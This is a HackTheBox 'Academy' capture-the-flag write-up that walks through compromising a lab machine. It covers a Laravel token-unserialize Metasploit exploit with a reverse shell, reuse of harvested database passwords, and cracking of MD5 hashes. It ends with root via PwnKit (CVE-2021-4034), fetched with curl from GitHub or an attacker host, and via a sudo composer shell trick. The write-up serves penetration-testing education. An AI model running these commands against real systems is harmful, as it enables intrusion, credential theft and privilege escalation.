# HackTheBox: Academy
## Notes by [Invictus808](https://invictus808.com)

## Scan

- [nmap](enumeration/external/nmap.txt)
    - ```console
        $ nmap -T4 -p- -A $IP
        ```
- nikto
    - [academy.htb](enumeration/external/nikto.txt)
        - ```console
            $ nikto -h http://academy.htb/
            ```
    - [dev-staging-01.academy.htb](enumeration/external/nikto-dev-staging-01.txt)
        - ```console
            $ nikto -h http://dev-staging-01.academy.htb/
            ```
- [dirbuster](enumeration/external/dirbuster.txt)


## Login Page

- use Burp Suite to obtain requests


### SQL Injection
- ```console
    $ sqlmap -r login.req -p uid --batch
    # unsuccessful

    $ sqlmap -r login.req -p password --batch
    # unsuccessful
    ```


## Register Page

- register a user
    - ![User registration page](screenshots/register.png "Register Page")
- register button has a hidden value
    - modifiable
        - 0 = regular user (`/login.php`)
        - 1 = admin user (`/admin.php`)
    - ![Exploited user registration page](screenshots/register_exploit.png "Exploited Register Page")


## Regular User

- sign in
    - user is always `egre55`
    - ![User home page](screenshots/user_dashboard.png "User Home Page")
- logout button has hidden token
    - ```
        kRL3ffDKHrHpP5QzNTsY7rdp0i1nu0FuNUDqAbww
        ```
    - never expires?
    - ![Exploited user home page](screenshots/user_dashboard_exploit.png "Exploited User Home Page")


## Admin User

- sign in (`/admin.php`)
    - dashboard (`/admin-page.php`)
        - `cry0l1t3`
        - `mrb3n`
        - `dev-staging-01.academy.htb`
            - add to `/etc/hosts` file
    - ![Admin home page](screenshots/admin_dashboard.png "Admin Home Page")


## Staging

- `dev-staging-01.academy.htb`
    - [stack trace](enumeration/external/dev-staging-01.academy.htb.error.log)
    - [environment & details](enumeration/external/dev-staging-01.academy.htb.txt)
        - APP_NAME
            - ```
                "Laravel"
                ```
        - APP_KEY
            - ```
                "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
                ```
        - database
            - ```yaml
                port: 3306
                username: homestead
                password: secret
                ```
    - ![Development staging page](screenshots/dev-staging-01_errors.png "Development Staging Page")


## Metasploit

### PHP Laravel Framework token Unserialize Remote Command Execution

- ```console
    msf6 > search laravel

    Matching Modules
    ================

    #  Name                                              Disclosure Date  Rank       Check  Description
    -  ----                                              ---------------  ----       -----  -----------
    0  exploit/unix/http/laravel_token_unserialize_exec  2018-08-07       excellent  Yes    PHP Laravel Framework token Unserialize Remote Command Execution
    1  exploit/multi/php/ignition_laravel_debug_rce      2021-01-13       excellent  Yes    Unauthenticated remote code execution in Ignition


    Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/php/ignition_laravel_debug_rce

    msf6 > use 0
    [*] Using configured payload cmd/unix/reverse_perl
    msf6 exploit(unix/http/laravel_token_unserialize_exec) > set app_key dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
    app_key => dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
    msf6 exploit(unix/http/laravel_token_unserialize_exec) > set rhosts 10.10.10.215
    rhosts => 10.10.10.215
    msf6 exploit(unix/http/laravel_token_unserialize_exec) > set vhost dev-staging-01.academy.htb
    vhost => dev-staging-01.academy.htb
    msf6 exploit(unix/http/laravel_token_unserialize_exec) > set lhost tun0
    lhost => tun0
    msf6 exploit(unix/http/laravel_token_unserialize_exec) > run
    ```


### Shell !!!

- ![www-data user shell](screenshots/www-data.png "www-data User Shell")


## File System Enumeration

- list valid machine users
    - ```console
        www-data@academy:/var/www/html/htb-academy-dev-01/public$ grep -vE "nologin|false" /etc/passwd
        ```
        - ![valid machine users](screenshots/machine_users.png "Valid Machine Users")

- [/var/www/html/academy/.env](enumeration/internal/academy.env)
    - ```sh
        DB_CONNECTION=mysql
        DB_HOST=127.0.0.1
        DB_PORT=3306
        DB_DATABASE=academy
        DB_USERNAME=dev
        DB_PASSWORD=mySup3rP4s5w0rd!!
        ```
- [/var/www/html/htb-academy-dev-01](enumeration/internal/htb-academy-dev-01.env)
    - ```sh
        DB_CONNECTION=mysql
        DB_HOST=127.0.0.1
        DB_PORT=3306
        DB_DATABASE=homestead
        DB_USERNAME=homestead
        DB_PASSWORD=secret
        ```
- [`/var/www/html/academy/public/config.php`](enumeration/internal/config.php)
    - ```php
        $link=mysqli_connect('localhost','root','GkEWXn4h34g8qx9fZ1','academy');
        ```


## Database

- log into database
    - ```console
        $ mysql -u root -pGkEWXn4h34g8qx9fZ1 -h localhost academy
        ```
- extract information
    - ```sql
        mysql> show tables;
        show tables;
        +-------------------+
        | Tables_in_academy |
        +-------------------+
        | users             |
        +-------------------+
        1 row in set (0.01 sec)

        mysql> select * from users;
        select * from users;
        +----+----------+----------------------------------+--------+---------------------+
        | id | username | password                         | roleid | created_at          |
        +----+----------+----------------------------------+--------+---------------------+
        |  5 | dev      | a317f096a83915a3946fae7b7f035246 |      0 | 2020-08-10 23:36:25 |
        | 11 | test8    | 5e40d09fa0529781afd1254a42913847 |      0 | 2020-08-11 00:44:12 |
        | 12 | test     | 098f6bcd4621d373cade4e832627b4f6 |      0 | 2020-08-12 21:30:20 |
        | 13 | test2    | ad0234829205b9033196ba818f7a872b |      1 | 2020-08-12 21:47:20 |
        | 14 | tester   | 098f6bcd4621d373cade4e832627b4f6 |      1 | 2020-08-13 11:51:19 |
        | 15 | invictus | b17444ca022c3fb9e39960e92b55813d |      1 | 2023-01-14 14:55:10 |
        +----+----------+----------------------------------+--------+---------------------+
        6 rows in set (0.00 sec)
        ```
- crack hash [crackstation.net](https://crackstation.net/)
    - ```sh
        # username:password
        dev:mySup3rP4s5w0rd!! # found by generating md5 hash of academy/.env DB_PASSWORD
        test8:test8
        test:test
        test2:test2
        tester:test
        invictus:invictus
        ```


## Reuse Password

- try `cry0l1t3` user
    - ```console
        $ su cry0l1t3
        Password: mySup3rP4s5w0rd!!
        ```
    - alternatively, ssh
        - ```console
            $ ssh cry0l1t3@$IP
            cry0l1t3@10.10.10.215's password: mySup3rP4s5w0rd!!
            ```
- success!
- spawn pseudo-terminal with python3
    - ```sh
        python3 -c "import pty; pty.spawn('/bin/bash')"
        ```
        - ![cry0l1t3 user shell](screenshots/cry0l1t3.png "cry0l1t3 User Shell")
- retrieve [`user.txt`](flags/user.txt) flag
    - ```console
        cry0l1t3@academy:~$ cat /home/cry0l1t3/user.txt
        ```


## Privilege Escalation

### SUID

- list files with Set-user Identification (SUID) permissions
    - ```console
        cry0l1t3@academy:~$ find / -perm -u=s -type f 2>/dev/null
        ```
        - ![cry0l1t3 SUID files](screenshots/cry0l1t3_suid.png "cry0l1t3 SUID Files")
            - `/usr/bin/pkexec` is exploitable!
- [PwnKit](https://github.com/ly4k/PwnKit)
    - Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation
- download `PwnKit` binary to target machine
    - ```console
        cry0l1t3@academy:~$ curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit || exit
        cry0l1t3@academy:~$ chmod +x ./PwnKit || exit
        cry0l1t3@academy:~$ (sleep 1 && rm ./PwnKit & )
        cry0l1t3@academy:~$ ./PwnKit
        ```
- run `PwnKit` binary on target machine
    - ```console
        cry0l1t3@academy:~$ ./PwnKit
        ```
- alternatively,
    - download `PwnKit` binary to attack machine
    - set up Python3 `http.server` module on attack machine
        - ```console
            $ python3 -m http.server $PORT -b $ATTACK_IP
            ```
    - download `PwnKit` binary to target machine from attack machine
        - ```console
            cry0l1t3@academy:~$ curl -fsSL http://$ATTACK_IP:$PORT/PwnKit -o PwnKit || exit
            cry0l1t3@academy:~$ chmod +x ./PwnKit || exit
            cry0l1t3@academy:~$ (sleep 1 && rm ./PwnKit & )
            cry0l1t3@academy:~$ ./PwnKit
            ```
- PWNED !!!
    - ![root shell - cry0l1t3](screenshots/root_cry0l1t3.png "Root Shell - cry0l1t3")
- retrieve [`root.txt`](flags/root.txt) flag
    - ```console
        root@academy:~# cat /root/root.txt
        ```


### Sudo

- `cry0l1t3` in group `adm`
    - `adm` group has access to `log` files
- check `audit.log`
    - ```console
        cry0l1t3@academy:~$ aureport --tty
        ```
        - ![cry0l1t3 audit report log](screenshots/cry0l1t3_aureport.png "cry0l1t3 Audit Report Log")
- switch to `mrb3n` user
    - ```console
        cry0l1t3@academy:~$ su mrb3n
        Password: mrb3n_Ac@d3my!
        ```
        - ![mrb3n user shell](screenshots/mrb3n.png "mrb3n User Shell")
- list sudo permissions
    - ```console
        mrb3n@academy:~$ sudo -l
        [sudo] password for mrb3n: mrb3n_Ac@d3my!
        ```
        - ![mrb3n sudo permissions](screenshots/mrb3n_sudo.png "mrb3n Sudo Permissions")
- [GTFOBins composer (sudo) exploit](https://gtfobins.github.io/gtfobins/composer/#sudo)
    - ```console
        mrb3n@academy:~$ TF=$(mktemp -d)
        mrb3n@academy:~$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
        mrb3n@academy:~$ sudo composer --working-dir=$TF run-script x
        ```
- PWNED !!!
    - ![root shell - mrb3n](screenshots/root_mrb3n.png "Root Shell - mrb3n")
- retrieve [`root.txt`](flags/root.txt) flag
    - ```console
        root@academy:~# cat /root/root.txt
        ```


## Acknowledgment of Completion

- [HackTheBox - Academy Completion](https://www.hackthebox.com/achievement/machine/1303009/297)
